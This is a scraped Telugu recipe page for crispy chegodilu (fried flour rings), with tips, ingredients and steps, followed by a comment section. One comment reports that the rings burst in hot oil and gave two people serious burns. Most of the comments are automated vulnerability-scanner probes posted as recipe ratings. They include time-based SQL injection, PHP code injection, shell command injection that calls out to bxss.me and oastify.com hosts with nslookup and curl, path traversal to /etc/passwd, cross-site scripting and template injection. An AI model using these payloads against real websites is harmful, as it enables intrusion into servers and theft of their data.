Snacks
4.8 AVERAGE
97 Comments

“చేగోడీలు” మాంచి టైం పాస్ స్నాక్. ఇది ఒక్క తెలుగు రాష్ట్రాల్లోనే కాదు, కర్ణాటక లోకూడా చేస్తారు. వారి తీరు కాస్త భిన్నంగా ఉంటుంది.

తెలుగు వారు ఈ చేగోడీలనే రెండు మూడు రకాలుగా చేస్తుంటారు. అందులో ఒకటి ఇది. చేగోడీలు చేయడం ఎంతో తేలిక, కానీ కొన్ని టిప్స్ అవసరం. ఆ టిప్స్ పిండి కలపడం దగ్గర నుండి చేగోడీలు వేపేదాకా ఉన్నాయి.

Chegodis | Chegodilu | Chekodi Recipe | Crispy Chekodi Recipe

టిప్స్

మైదా:

  • నేను ఈ చేగోడీలకి మైదా వాడాను, కావాలంటే మీరు బియ్యం పిండి వాడుకోవచ్చు.
  • గోధుమ పిండి తో కూడా చేసుకోవచ్చకు కానీ కాస్త బొంబాయ్ రవ్వ వేసి పిండి కలుపుకోవాలి. కానీ బియ్యం పిండి మైదా పిండి అంత కరకరలాడవు చేగోడీలు.

నెయ్యి- డాల్డా:

  • నెయ్యి లేదా డాల్డా చేగోడీలు మరింత కరకరలాడేట్టు చేస్తుంది. నచ్చని వారు వేడి వేడి నూనె వేసుకోవచ్చు.

వాము:

  • వాము నలిపి వేస్తే చేగోడీలు ఘాటుగా ఉంటాయి. కారం అవసరం ఉండదు. నచ్చితే కొద్దిగా కారం వేసుకోవచ్చు. జీలకర్ర వేసినా రుచిగానే ఉంటుంది

పసుపు:

  • నేను చేగోడీలల్లో కొద్దిగా పసుపు వేశాను, ఆంధ్రాలో చేగోడీలు తెల్లగా కూడా ఉంటాయి. కాబట్టి పసుపు ఆప్షనల్

పిండి ఇలా వత్తుకోవాలి:

  • చేగోడీలకి నీళ్ళు పిండి ఒకే కొలత. పిండి నీళ్ళని పీల్చుకున్నకా వేడి మీదే వత్తాలి. వేడి మీద వత్తడం కష్టం, కాబట్టి తడిపి గట్టిగా పిండిన తడి గుడ్డతో సాధ్యమైనంత మేర బాగా వత్తుకుంటే, మిలినది గోరు వెచ్చగా ఉన్నప్పుడు వత్తుకోవచ్చు.

  • చేగోడీల కోసం కొద్దిగా పిండి తీసుకుని పొడవుగా చేసి వ చుట్టు సీల్ చేస్తారు, నేను పని సులభమవడానికి ఇంట్లో ఉండే కారప్పూస గిద్దలో పెద్ద రంధ్రం ఉండే ప్లేట్ పెట్టి దానితో వత్తుకుంటే పొడవుగా చేగోడీల పిండి వస్తుంది, తరువాత రింగ్స్ గా చుట్టేసుకోవచ్చు.

  • చేగోడీలు చేసి గాలికి కాస్త ఆరనిస్తే నూనె వేశాక పేలవు.

ఛేగోడీలు ఎందుకు మెత్తగా వస్తాయ్?

• చేగోడీలు వేసే ముందు నూనె బాగా వేడిగా ఉండాలి. వేడెక్కిన నూనె స్టవ్ ఆపేసి చేగోడీలు కొన్ని మాత్రమే వేసి వదిలేస్తే నూనెని పీల్చి చేగోడీలు పైకి తేలతాయ్. అప్పుడు స్టవ్ వెలిగించి హై-ఫ్లేమ్ మీద వేపితే చక్కగా వేగుతాయ్.

• నూనె వేడి సరిగా లేకపోయినా, ముకుడు సైజుకి మించి చేగోడీలు వేసినా, చేగోడీలు పైకి తేలాక హై-ఫ్లేమ్ మీద వేపకపోయినా రంగోస్తాయ్ కానీ మెత్తగా ఉంటాయి.

• చేగోడీలు వేసేప్పుడు నూనెలో గరిట పెడితే బరువుగా ఉండే చేగోడీలు, అడుగు పట్టవు. ఓ నిమిషం తరువాత చేగోడీలు పైకి తేలతాయ్, అప్పుడు గరిట తీసేయండి.

• అసలు చేగోడీలు వేపేప్పుడే ఒక చేగోడీ తీసి విరిపితే తెలిసిపోతుంది ఎంత వేగింది అన్నది.

• చేగోడీలు మరీ ఎర్రగా నూనెలోనే వేపితే చల్లారాక ఇంకా ముదురు రంగులోకి మారతాయ్.

చేగోడీలు రెసిపి - రెసిపీ వీడియో

Chegodis | Chegodilu | Chekodi Recipe | Crispy Chekodi Recipe | How to Make Chekodi

Snacks | vegetarian
  • Prep Time 10 mins
  • Cook Time 30 mins
  • Total Time 40 mins

కావాల్సిన పదార్ధాలు

  • 250 ml నీళ్ళు
  • 1 tbsp నెయ్యి/డాల్డా
  • 1 tsp వాము
  • 1 tsp నువ్వులు
  • 1/2 tsp పసుపు
  • సాల్ట్
  • 250 gms మైదా
  • నూనె- వేయించడానికి సరిపడా

విధానం

  1. నీళ్ళని మరిగించాలి. నీళ్ళు కాగుతున్నపుడు మైదా తప్ప అన్నీ వేసి నీళ్ళని తెర్లనివ్వండి.
  2. నీళ్ళు తెర్లుతున్నప్పుడు మైదా వేసి స్టవ్ ఆఫ్ చేసి బాగా కలుపుకొండి
  3. వేడి మీదే పిండి బాగా వత్తుకోవాలి, లేదంటే చెకోడీలు సరిగా రావు విరిగిపోతాయ్
  4. వేడి మీదే ఓ తడి గుడ్డ పిండి మీద కప్పి, గుడ్డతో సహా వత్తుతూ పిండిని బాగా కలుపుకొండి, ఇలా చేస్తే సులువుగా ఉంటుంది వేడి మీద వత్తుకోవడానికి
  5. పిండి బాగా కలుపుకున్నాక కారప్పూస గిద్దలో పెద్ద రంద్రాలుండే మౌల్ద్ పెట్టి లోపల నెయ్యి రాసి పిండి ముద్ద ఉంచి పూర్తిగా ఓ ప్లేట్ లో, లేదా బల్ల మీద వత్తుకోండి.
  6. ఇప్పుడు వత్తుకున్న వాటిని వెలికి చుట్టుకుని అంచులని సీల్ చేస్తూ చిన్న చిన్న రింగ్స్ గా చేసుకోండి. వీటిని గాలికి 30 నిమిషాలు ఆరనివ్వండి.
  7. ఇలాగే అన్నీ రెడీ చేసుకోండి. మౌల్ద్ లేకపోతే చేత్తోనే ముందు పిండిని పొడవుగా సన్నగా వత్తుకుని తరువాత రింగ్స్ గా చేసుకోండి.
  8. ఇప్పుడు నూనె బాగా వేడెక్కాక స్టవ్ ఆపేసి నూనెలో ఓ చిల్లుల గరిట పెట్టి దాని మీద కొన్ని చేగోడీలు వేసుకోండి.
  9. ఆ గరిట ఓ నిమిషం పాటు నూనె లోనే ఉంచి హై-ఫ్లేం మీద వేగనివ్వండి చెగోడీలని(వేపే టిప్స్ టిప్స్ లో వివరంగా ఉండి చూడగలరు).
  10. గరిట తీసేసి చేగోడీలను హై ఫ్లేం మీద 3-4 నిమిషాలు వేగనివ్వాలి.
  11. ఎర్రగా వేగాక చిల్లుల బుట్ట లేదా టిష్యూ నాప్కిన్ మీద తీసుకోండి. పూర్తిగా చల్లారాక డబ్బాలో పెట్టుకోండి

Leave a comment

Rate this Recipe:
Your email address will not be published.

97 comments

  • H
    hdfg
    Recipe Rating:
    f7n4crvs7g2aj96eg4kohv3bh2ntbpze.oastify.com
  • S
    sathuu
    Recipe Rating:
    alert(1)
  • S
    sathuu
    Recipe Rating:
    alert(1)
  • S
    sathuu
    Recipe Rating:
    alert(1)
  • D
    Do not want to disclose
    We followed steps. 250 ml oc water and 250gms of rice flour..But when we put those rings in hot oil, they started to burst leaving both of us with serious 2nd degree burns on face and all over the body. We are recovering but wanted to let you know that others won't fall in the same situation as us...I understood that the rings started to burst because water was not enough when flour was mixed...nor sure whether it depends on the flour
    • X
      Xx
      By the way, we tried many other recipes posted by you. Those turned out to be delicious and thank you for those recipes. This one went horribly wrong and I want to leg you know so that if you need to provide so.e tips to avoid bursting , others won't face similar situation ad is. Thank you
  • S
    Suresh
    Recipe Rating:
    Super chala bagunnai
  • S
    Sravanthi
    Super and tips use chesi chesthanu e sari
    • K
      kEMlzpAX
      Recipe Rating:
      @@OaDEB
    • K
      kEMlzpAX
      Recipe Rating:
      1????%2527%2522\'\"
    • K
      kEMlzpAX
      Recipe Rating:
      1'"
    • K
      kEMlzpAX
      Recipe Rating:
      1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
    • K
      kEMlzpAX
      Recipe Rating:
      1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
    • K
      kEMlzpAX
      Recipe Rating:
      1hCge5Aep')) OR 796=(SELECT 796 FROM PG_SLEEP(15))--
    • K
      kEMlzpAX
      Recipe Rating:
      1bSPJoqAh') OR 81=(SELECT 81 FROM PG_SLEEP(15))--
    • K
      kEMlzpAX
      Recipe Rating:
      1cqIT7J6H' OR 644=(SELECT 644 FROM PG_SLEEP(15))--
    • K
      kEMlzpAX
      Recipe Rating:
      1-1)) OR 176=(SELECT 176 FROM PG_SLEEP(15))--
    • K
      kEMlzpAX
      Recipe Rating:
      1-1) OR 196=(SELECT 196 FROM PG_SLEEP(15))--
    • K
      kEMlzpAX
      Recipe Rating:
      1-1 OR 93=(SELECT 93 FROM PG_SLEEP(15))--
    • K
      kEMlzpAX
      Recipe Rating:
      1dUGwu39Q'; waitfor delay '0:0:15' --
    • K
      kEMlzpAX
      Recipe Rating:
      1-1); waitfor delay '0:0:15' --
    • K
      kEMlzpAX
      Recipe Rating:
      1-1; waitfor delay '0:0:15' --
    • K
      kEMlzpAX
      Recipe Rating:
      (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
    • K
      kEMlzpAX
      Recipe Rating:
      10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
    • K
      kEMlzpAX
      Recipe Rating:
      10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
    • K
      kEMlzpAX
      Recipe Rating:
      1*if(now()=sysdate(),sleep(15),0)
    • K
      kEMlzpAX
      Recipe Rating:
      -1 OR 3+61-61-1=0+0+0+1
    • K
      kEMlzpAX
      Recipe Rating:
      -1 OR 2+61-61-1=0+0+0+1
    • K
      kEMlzpAX
      Recipe Rating:
      1*1
    • K
      kEMlzpAX
      Recipe Rating:
      1*1
    • K
      kEMlzpAX
      Recipe Rating:
      1*1
    • K
      kEMlzpAX
      Recipe Rating:
      1*1
    • K
      kEMlzpAX
      Recipe Rating:
      1wOxCVc59
    • K
      kEMlzpAX
      Recipe Rating:
      [php]print(md5(31337));[/php]
    • K
      kEMlzpAX
      Recipe Rating:
      {php}print(md5(31337));{/php}
    • K
      kEMlzpAX
      Recipe Rating:
      print(md5(31337));//
    • K
      kEMlzpAX
      Recipe Rating:
      '{${print(md5(31337))}}'
    • K
      kEMlzpAX
      Recipe Rating:
      '.print(md5(31337)).'
    • K
      kEMlzpAX
      Recipe Rating:
      ${@print(md5(31337))}\
    • K
      kEMlzpAX
      Recipe Rating:
      ${@print(md5(31337))}
    • K
      kEMlzpAX
      Recipe Rating:
      ";print(md5(31337));$a="
    • K
      kEMlzpAX
      Recipe Rating:
      ';print(md5(31337));$a='
    • K
      kEMlzpAX
      Recipe Rating:
      ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
    • K
      kEMlzpAX
      Recipe Rating:
      gethostbyname(lc('hitwa'.'zczszfov86a0e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(75).chr(113).chr(71)
    • K
      kEMlzpAX
      Recipe Rating:
      ".gethostbyname(lc("hitdt"."ktmnuagg32375.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(74).chr(100).chr(89)."
    • K
      kEMlzpAX
      Recipe Rating:
      '.gethostbyname(lc('hitzt'.'bgnlxknr9d4c2.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(70).chr(104).chr(78).'
    • K
      kEMlzpAX
      Recipe Rating:
      https://vismaifood.com/
    • K
      kEMlzpAX
      Recipe Rating:
      vismaifood.com
    • K
      kEMlzpAX
      Recipe Rating:
      ./1
    • K
      kEMlzpAX
      Recipe Rating:
      ../1
    • K
      kEMlzpAX
      Recipe Rating:
      file:///etc/passwd
    • K
      kEMlzpAX
      Recipe Rating:
      '"
    • K
      kEMlzpAX
      Recipe Rating:
      )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
    • K
      kEMlzpAX
      Recipe Rating:
      xfs.bxss.me
    • K
      kEMlzpAX
      Recipe Rating:
      ;(nslookup -q=cname hithkreivnutd8a532.bxss.me||curl hithkreivnutd8a532.bxss.me)|(nslookup -q=cname hithkreivnutd8a532.bxss.me||curl hithkreivnutd8a532.bxss.me)&(nslookup -q=cname hithkreivnutd8a532.bxss.me||curl hithkreivnutd8a532.bxss.me)
    • K
      kEMlzpAX
      Recipe Rating:
      `(nslookup -q=cname hitzgfxkaibeg9f789.bxss.me||curl hitzgfxkaibeg9f789.bxss.me)`
    • K
      kEMlzpAX
      Recipe Rating:
      |(nslookup -q=cname hitjrtpecejoze44a7.bxss.me||curl hitjrtpecejoze44a7.bxss.me)
    • K
      kEMlzpAX
      Recipe Rating:
      1"||sleep(27*1000)*woycox||"
    • K
      kEMlzpAX
      Recipe Rating:
      &(nslookup -q=cname hitpjwvtwauuwd27f3.bxss.me||curl hitpjwvtwauuwd27f3.bxss.me)&'\"`0&(nslookup -q=cname hitpjwvtwauuwd27f3.bxss.me||curl hitpjwvtwauuwd27f3.bxss.me)&`'
    • K
      kEMlzpAX
      Recipe Rating:
      1'||sleep(27*1000)*uvphkf||'
    • K
      kEMlzpAX
      Recipe Rating:
      &nslookup -q=cname hitzeurvqvbpl288c7.bxss.me&'\"`0&nslookup -q=cname hitzeurvqvbpl288c7.bxss.me&`'
    • K
      kEMlzpAX
      Recipe Rating:
      1"&&sleep(27*1000)*uotfop&&"
    • K
      kEMlzpAX
      Recipe Rating:
      $(nslookup -q=cname hitonkdwaznyk08ee0.bxss.me||curl hitonkdwaznyk08ee0.bxss.me)
    • K
      kEMlzpAX
      Recipe Rating:
      (nslookup -q=cname hitwsdelraizs4cb73.bxss.me||curl hitwsdelraizs4cb73.bxss.me))
    • K
      kEMlzpAX
      Recipe Rating:
      1'&&sleep(27*1000)*qwyyao&&'
    • K
      kEMlzpAX
      Recipe Rating:
      1|echo jgeqrq$()\ tnxbuq\nz^xyu||a #' |echo jgeqrq$()\ tnxbuq\nz^xyu||a #|" |echo jgeqrq$()\ tnxbuq\nz^xyu||a #
    • K
      kEMlzpAX
      Recipe Rating:
      'A'.concat(70-3).concat(22*4).concat(98).concat(78).concat(119).concat(68)+(require'socket' Socket.gethostbyname('hitmb'+'mbiyzxik09786.bxss.me.')[3].to_s)
    • K
      kEMlzpAX
      Recipe Rating:
      '"()
    • K
      kEMlzpAX
      Recipe Rating:
      |echo hpcpyc$()\ kdsfbv\nz^xyu||a #' |echo hpcpyc$()\ kdsfbv\nz^xyu||a #|" |echo hpcpyc$()\ kdsfbv\nz^xyu||a #
    • K
      kEMlzpAX
      Recipe Rating:
      '+'A'.concat(70-3).concat(22*4).concat(118).concat(83).concat(106).concat(73)+(require'socket' Socket.gethostbyname('hitha'+'oybrrhbg25476.bxss.me.')[3].to_s)+'
    • K
      kEMlzpAX
      Recipe Rating:
      1&echo rzabkk$()\ bcheqn\nz^xyu||a #' &echo rzabkk$()\ bcheqn\nz^xyu||a #|" &echo rzabkk$()\ bcheqn\nz^xyu||a #
    • K
      kEMlzpAX
      Recipe Rating:
      "+"A".concat(70-3).concat(22*4).concat(109).concat(84).concat(114).concat(77)+(require"socket" Socket.gethostbyname("hitpw"+"tpvbhqxee1581.bxss.me.")[3].to_s)+"
    • K
      kEMlzpAX
      Recipe Rating:
      &echo gfwcpr$()\ mjkoao\nz^xyu||a #' &echo gfwcpr$()\ mjkoao\nz^xyu||a #|" &echo gfwcpr$()\ mjkoao\nz^xyu||a #
    • K
      kEMlzpAX
      Recipe Rating:
      echo dojchc$()\ izmswj\nz^xyu||a #' &echo dojchc$()\ izmswj\nz^xyu||a #|" &echo dojchc$()\ izmswj\nz^xyu||a #
    • K
      kEMlzpAX
      Recipe Rating:
      ^(#$!@#$)(()))******
    • K
      kEMlzpAX
      Recipe Rating:
      chegodis-chegodilu-chekodi-recipe-crispy-chekodi-recipe-how-to-make-chekodi/.
    • K
      kEMlzpAX
      Recipe Rating:
      !(()&&!|*|*|
    • K
      kEMlzpAX
      Recipe Rating:
      chegodis-chegodilu-chekodi-recipe-crispy-chekodi-recipe-how-to-make-chekodi
    • K
      kEMlzpAX
      Recipe Rating:
      chegodis-chegodilu-chekodi-recipe-crispy-chekodi-recipe-how-to-make-chekodi
    • K
      kEMlzpAX
      Recipe Rating:
      bxss.me
    • K
      kEMlzpAX
      Recipe Rating:
      c:/windows/win.ini
    • K
      kEMlzpAX
      Recipe Rating:
      ../../../../../../../../../../../../../../etc/shells
    • K
      kEMlzpAX
      Recipe Rating:
      /etc/shells
    • K
      kEMlzpAX
      Recipe Rating:
      http://bxss.me/t/fit.txt?.jpg
    • K
      kEMlzpAX
      Recipe Rating:
      Http://bxss.me/t/fit.txt
    • K
      kEMlzpAX
      Recipe Rating:
      1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
    • K
      kEMlzpAX
      Recipe Rating:
      http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
    • K
      kEMlzpAX
      Recipe Rating:
      1&n933653=v940352
    • K
      kEMlzpAX
      Recipe Rating:
      ${9999263+10000272}
    • K
      kEMlzpAX
      Recipe Rating:
      12345'"\'\");|]*{ ?''💡
    • K
      kEMlzpAX
      Recipe Rating:
      3dQtmLsm: qlQBPGe5
    • K
      kEMlzpAX
      Recipe Rating:
      "+response.write(9122885*9375686)+"
    • K
      kEMlzpAX
      Recipe Rating:
      dNe0ho8P
    • K
      kEMlzpAX
      Recipe Rating:
      '+response.write(9122885*9375686)+'
    • K
      kEMlzpAX
      Recipe Rating:
      response.write(9122885*9375686)
Chegodis | Chegodilu | Chekodi Recipe | Crispy Chekodi Recipe